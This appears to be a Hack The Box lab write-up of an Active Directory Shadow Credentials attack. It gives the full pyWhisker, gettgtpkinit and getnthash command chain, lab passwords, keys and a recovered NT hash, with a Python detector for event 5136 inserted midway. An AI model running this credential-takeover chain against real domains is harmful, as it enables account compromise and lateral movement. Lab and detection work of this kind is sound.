Windows Remote Shadow Credentials
PyWhisker
To use pyWhisker, we need valid credentials.
With creds, I can try to run pyWhisker remotely. It fails:
python3 /opt/pywhisker/pywhisker.py --action list -d outdated.htb \
  -u btables -p 5myBPLPDKT3Bfq \
  --dc-ip 10.10.11.175 -t 10.10.11.175
[!] automatic bind not successful - strongerAuthRequired
This shows that the LDAP bind failed because the DC requires a stronger (TLS-protected) bind. Adding --use-ldaps fixes it:
python3 /opt/pywhisker/pywhisker.py --action list -d outdated.htb \
  -u btables -p 5myBPLPDKT3Bfq --dc-ip 10.10.11.175 \
  -t sflowers --use-ldaps
[*] Searching for the target account
[*] Target user found: CN=Susan Flowers,CN=Users,DC=outdated,DC=htb
[*] Attribute msDS-KeyCredentialLink is either empty or user does not have read permissions on that attribute
sflowers has no shadow credentials yet. Add one:
python3 /opt/pywhisker/pywhisker.py --action add -d outdated.htb \
  -u btables -p 5myBPLPDKT3Bfq --dc-ip 10.10.11.175 \
  -t sflowers --use-ldaps
[*] Searching for the target account
[*] Target user found: CN=Susan Flowers,CN=Users,DC=outdated,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: fddf766d-4eb3-193f-169f-42afc68ae6da
[*] Updating the msDS-KeyCredentialLink attribute of sflowers
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[+] Saved PFX (#PKCS12) certificate & key at path: alTWylpv.pfx
[*] Must be used with password: CpgwxPvDtXvsf4wNjjgN
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
We have successfully generated a KeyCredential for sflowers.
Following the hint, the TGT can be obtained with PKINITtools:
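The write pyWhisker just made ("Updating the msDS-KeyCredentialLink attribute of sflowers") is what a defender can look for: with directory object auditing enabled, the DC logs attribute changes as Security event 5136, with the attribute name in AttributeLDAPDisplayName. The detector below is an added example, not part of this writeup or of pyWhisker; the event records are constructed samples using 5136's field names, and the self-write heuristic on the object's CN is an assumption of this example.

```python
"""Flag msDS-KeyCredentialLink writes in Windows Security event 5136 records."""
from dataclasses import dataclass

WATCHED_ATTRIBUTE = "msDS-KeyCredentialLink"
OPERATIONS = {"%%14674": "added", "%%14675": "deleted"}  # 5136 OperationType codes

# Constructed sample events (field names follow event 5136's EventData); not real logs.
SAMPLE_EVENTS = [
    {"EventID": 5136, "SubjectUserName": "btables",
     "ObjectDN": "CN=Susan Flowers,CN=Users,DC=outdated,DC=htb",
     "AttributeLDAPDisplayName": "msDS-KeyCredentialLink", "OperationType": "%%14674",
     "AttributeValue": "B:828:00020000...(truncated constructed value)"},
    {"EventID": 5136, "SubjectUserName": "helpdesk",
     "ObjectDN": "CN=Bob Jones,CN=Users,DC=outdated,DC=htb",
     "AttributeLDAPDisplayName": "description", "OperationType": "%%14674",
     "AttributeValue": "Finance"},
    {"EventID": 5136, "SubjectUserName": "WS01$",
     "ObjectDN": "CN=WS01,CN=Computers,DC=outdated,DC=htb",
     "AttributeLDAPDisplayName": "msDS-KeyCredentialLink", "OperationType": "%%14674",
     "AttributeValue": "B:828:00020000...(truncated constructed value)"},
    {"EventID": 4624, "SubjectUserName": "btables"},  # unrelated logon event
]


@dataclass(frozen=True)
class Finding:
    actor: str       # SubjectUserName that performed the write
    target_dn: str   # object whose msDS-KeyCredentialLink changed
    operation: str   # "added", "deleted" or "other"
    self_write: bool # True when a principal wrote its own object (expected for device registration)


def _is_self_write(actor: str, target_dn: str) -> bool:
    # Heuristic (assumption): compare the actor (machine accounts end in '$') with the
    # object's CN. A computer enrolling its own key matches; a user account writing
    # another principal's attribute, as pyWhisker did above, does not.
    rdn = target_dn.split(",", 1)[0]
    cn = rdn[3:] if rdn.upper().startswith("CN=") else rdn
    return actor.rstrip("$").lower() == cn.lower()


def detect_keycredential_writes(events) -> list:
    """Return one Finding per 5136 event that touched msDS-KeyCredentialLink."""
    findings = []
    for ev in events:
        if ev.get("EventID") != 5136 or ev.get("AttributeLDAPDisplayName") != WATCHED_ATTRIBUTE:
            continue
        actor, target = ev["SubjectUserName"], ev["ObjectDN"]
        findings.append(Finding(actor, target, OPERATIONS.get(ev.get("OperationType"), "other"),
                                _is_self_write(actor, target)))
    return findings
```

Findings where self_write is False (a user account writing another principal's key credential) are the ones to triage first.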
python3 /opt/PKINITtools/gettgtpkinit.py -cert-pfx alTWylpv.pfx \
  -pfx-pass CpgwxPvDtXvsf4wNjjgN outdated.htb/sflowers sflowers.ccache \
  -dc-ip 10.10.11.175
2022-08-03 23:09:10,618 minikerberos INFO Loading certificate and key from file
INFO:minikerberos:Loading certificate and key from file
2022-08-03 23:09:10,630 minikerberos INFO Requesting TGT
INFO:minikerberos:Requesting TGT
2022-08-03 23:09:10,826 minikerberos INFO AS-REP encryption key (you might need this later):
INFO:minikerberos:AS-REP encryption key (you might need this later):
2022-08-03 23:09:10,826 minikerberos INFO 91229b2482fcba24d91bd4a57e5d04cd403eba67c60a83d70ff39a72ee571f8f
INFO:minikerberos:91229b2482fcba24d91bd4a57e5d04cd403eba67c60a83d70ff39a72ee571f8f
2022-08-03 23:09:10,831 minikerberos INFO Saved TGT to file
INFO:minikerberos:Saved TGT to file
I hit a Kerberos time skew error; fix that by stopping the VirtualBox service that adjusts the time in my VM (sudo service vboxadd-service stop) and then syncing the clock with the DC: sudo rdate -n 10.10.11.175.
Next, run the getnthash.py script.
Create a virtual environment and install the dependencies:
python3 -m venv venv
source venv/bin/activate
pip3 install .
Then it worked:
export KRB5CCNAME=sflowers.ccache
python3 /opt/PKINITtools/getnthash.py outdated.htb/sflowers \
  -key 91229b2482fcba24d91bd4a57e5d04cd403eba67c60a83d70ff39a72ee571f8f
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Using TGT from cache
[*] Requesting ticket to self with PAC
Recovered NT Hash
1fcdb1f6015dcb318cc77bb2bda14db5